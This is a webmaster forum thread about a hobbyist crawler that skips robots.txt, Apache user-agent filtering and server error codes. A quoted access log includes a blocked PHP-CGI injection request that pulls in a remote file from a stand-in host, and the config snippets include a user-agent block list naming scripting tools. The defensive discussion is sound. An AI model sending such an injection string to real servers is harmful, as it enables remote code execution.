Simple crawler


keyplyr

8:37 am on Nov 14, 2015 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



UA: Simple crawler (Linux x86_64; pl) (http://crawler.own3d.pl)
Protocol: HTTP/1.1
Robots.txt: No
Host: OVH
37.187.0.0 - 37.187.255.255
37.187.0.0/16
Welcome to my website
I'am a simple crawler written in python
Leave a message if you want ;)
Waiting for a reply

lucy24

7:21 pm on Nov 14, 2015 (gmt 0)


:: detour to raw logs because this one looked familiar ::

My, my. A comprehensive UA block on the simple (haha) string "Simple", case-sensitive, would certainly do no harm:
"GET / HTTP/1.1" 200 6386 "-" "Simple cURL Request"
"GET /robots.txt HTTP/1.1" 200 949 "-" "LWP::Simple/6.13 libwww-perl/6.13"
"GET /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://www.example.com/.fp/r.txt HTTP/1.1" 403 2878 "-" "LWP::Simple/5.827 libwww-perl/5.833"

I also learned that some CMS or other must use "simple" in its boilerplate, because I found an awful lot of blocked requests for it. (So does piwik, but that's in the top-level /piwik/ directory.)

:: further detour to find out what a 501 error is, not that I'm complaining ::

keyplyr

10:27 pm on Nov 14, 2015 (gmt 0)


One of my UA filters is a comprehensive block on all known programming languages and other common terms: perl, php, python, pear, java, crawl, spider, etc. Then a couple of lines allow beneficial agents to use these.
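A filter of that shape can be sketched like this in Apache 2.4 syntax (illustrative only; the substrings and whitelisted agents here are examples, not keyplyr's actual list):

```apache
# Flag suspicious UA substrings, case-insensitively...
SetEnvIfNoCase User-Agent "(perl|php|python|pear|java|curl|crawl|spider)" bad_ua
# ...then clear the flag for agents you want through anyway.
SetEnvIfNoCase User-Agent "Googlebot" !bad_ua
SetEnvIfNoCase User-Agent "bingbot" !bad_ua
<RequireAll>
    Require all granted
    Require not env bad_ua
</RequireAll>
```

The `!bad_ua` form removes the variable if an earlier line set it, which is what makes the "couple lines allowing beneficial agents" work.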

My goal of late is to find some reason to allow access.

keyplyr

11:36 am on Nov 15, 2015 (gmt 0)


RE: 501 error

I've had sites on a half-dozen hosts and have worked on sites at a dozen more, and our host is unique in the way it reports server errors (the 500 family).

Have you noticed that a plain 500 error is almost never logged (except when we ourselves crash our htaccess)? It's always a 501 or a 503.

It's like they never want to admit that it was a straight server error on their end. They always want to add some other element to it.

Since this was true even before the migration to SSD servers, it must be policy, or at least the policy of the head admin.

lucy24

7:37 pm on Nov 15, 2015 (gmt 0)


My goal of late is to find some reason to allow access.

I think the first hole I ever poked was for the w3 link checker. Their UA exasperatingly uses some standard robotic element --libcurl maybe?-- and I got tired of having to comment-out the line every time I used checklink. So now it's !keep_out if the originating IP is from the appropriate /24. (I'm not concerned with malign agents running a comprehensive checklink on my site.)
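Poking that kind of hole can be sketched as follows (the /24 below is the 192.0.2.0/24 documentation range, a placeholder for the checker's actual subnet; the UA substrings are likewise illustrative):

```apache
# Flag the robotic library strings the link checker happens to share...
SetEnvIfNoCase User-Agent "libwww-perl|libcurl" keep_out
# ...then unflag requests originating from the checker's /24.
SetEnvIf Remote_Addr "^192\.0\.2\." !keep_out
<RequireAll>
    Require all granted
    Require not env keep_out
</RequireAll>
```

The IP exception means the UA line never has to be commented out just to run a link check.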

I looked up the 503 error a while ago because it shows up pretty often on files that belong to my games. Turns out one legitimate reason is "too many concurrent requests"; my host's server must currently be set for 100. (Years ago it seems to have been 30, but they must have figured out this doesn't cut it.) It doesn't affect the human user, because the browser just repeats the request.

I also use 503 when I'm intentionally sending back an "under construction" message, so humans can get the right error page. (This is a bit funny, because I'm pretty sure that in a spontaneous 503, the server wouldn't be able to send back anything, since it's already overloaded.)
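An intentional "under construction" 503 is commonly done like this (a sketch; the page name is illustrative):

```apache
# Serve a friendly page with the 503 status during maintenance.
ErrorDocument 503 /maintenance.html
RewriteEngine On
# Don't 503 the maintenance page itself, or nothing renders.
RewriteCond %{REQUEST_URI} !^/maintenance\.html$
RewriteRule ^ - [R=503,L]
```

mod_rewrite allows non-3xx codes in the R flag; with a status outside the redirect range the substitution is ignored and the code is simply returned, which is exactly what's wanted here.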

The 501 error-- I looked it up the other day-- is something like "I can't even figure out what you're asking for so I don't know if I'd be able to grant it". Who knows? It may even make malign robots go away faster than a routine 403.

For me the 500 error has never been anything but "Look, doofus, you made a mistake in your own htaccess so don't expect me to do anything about it".

My host used to use something 500-class for mod_security but now they use 418. (I checked the docs once. You can tell the mod what error code to return.) I assume this is so people reading logs can tell what triggered the lockout. (Error Log entries for 403 rank as The Single Most Uninformative Thing in Apache.)
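Picking the status code is indeed a documented knob in ModSecurity 2.x; in the server config it can be as small as this (a sketch of the one relevant directive, not a working ruleset):

```apache
SecRuleEngine On
# Any rule that inherits the default action will deny with 418
# instead of the usual 403/500-class response.
SecDefaultAction "phase:2,deny,status:418,log"
```

Returning an unusual code like 418 makes mod_security blocks instantly recognizable in the access log, which fits the log-reading rationale above.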

keyplyr

10:38 am on Nov 17, 2015 (gmt 0)


You can tell the mod what error code to return.
Yes, that's what the Apache docs say. However, the server config can, and with shared hosting accounts usually does, override what we do in htaccess, especially with response codes.
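The override happens at the directory level in the main config; the host only has to write something like this (illustrative path) and per-directory htaccess directives stop being honored:

```apache
<Directory /var/www/html>
    # Ignore htaccess files entirely under this tree.
    AllowOverride None
</Directory>
```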

Got a reply from the bot-runner:

>What are you doing with the data you collect?

I collect only domain names, don’t store any other data.
Crawler just download index page and search for links to other sites.

>Why does your bot not support robots.txt?

Because I visit every page only once, and never get back :)

>Give me a reason to allow your bot :)

Because its tiny and small puppy ;)
Its made only for fun, I just want to know how many pages it can reach
starting from one.
Now its above 3000000 after one week, my server is very sloooow, so i
think its good score ;)

p.s. sorry for my english ;)
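The behavior the bot-owner describes, fetch each page once and harvest the domains it links to, can be sketched in a few lines of Python (names and structure here are our own guess; the actual crawler's code isn't public):

```python
# Minimal sketch of a "visit once, collect domains" crawler's core:
# parse one page's HTML and return the set of hostnames it links to.
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

class LinkParser(HTMLParser):
    """Collects href targets from <a> tags."""
    def __init__(self):
        super().__init__()
        self.links = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            for name, value in attrs:
                if name == "href" and value:
                    self.links.append(value)

def extract_domains(html, base_url):
    """Return the set of hostnames linked from one page.

    Relative links are resolved against base_url before the
    hostname is pulled out, so local links count toward the
    page's own domain.
    """
    parser = LinkParser()
    parser.feed(html)
    domains = set()
    for link in parser.links:
        host = urlparse(urljoin(base_url, link)).hostname
        if host:
            domains.add(host)
    return domains
```

A real run would fetch each newly seen domain's index page exactly once and feed it back through `extract_domains`, which matches the "visit every page only once, and never get back" description, and also explains why it skips robots.txt: one request per site, then gone.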

lucy24

8:03 pm on Nov 17, 2015 (gmt 0)


however, the server config can, and usually does with shared hosting accounts, override what we do with htaccess

In the specific case of mod_security, it can only be used in config. (The original version could also be used in htaccess.)

Because its tiny and small puppy

Gosh, I'd love to know about this idiom in the writer's home language.

keyplyr

8:24 pm on Nov 17, 2015 (gmt 0)


Because its tiny and small puppy

Gosh, I'd love to know about this idiom in the writer's home language.

[edited by: keyplyr at 10:47 am (utc) on Jul 8, 2016]

lucy24

9:31 pm on Nov 17, 2015 (gmt 0)


Y'know, in another venue I have a fixed rule: any post that makes me laugh out loud gets an automatic upvote. I think, however, that the present forum operates by different criteria.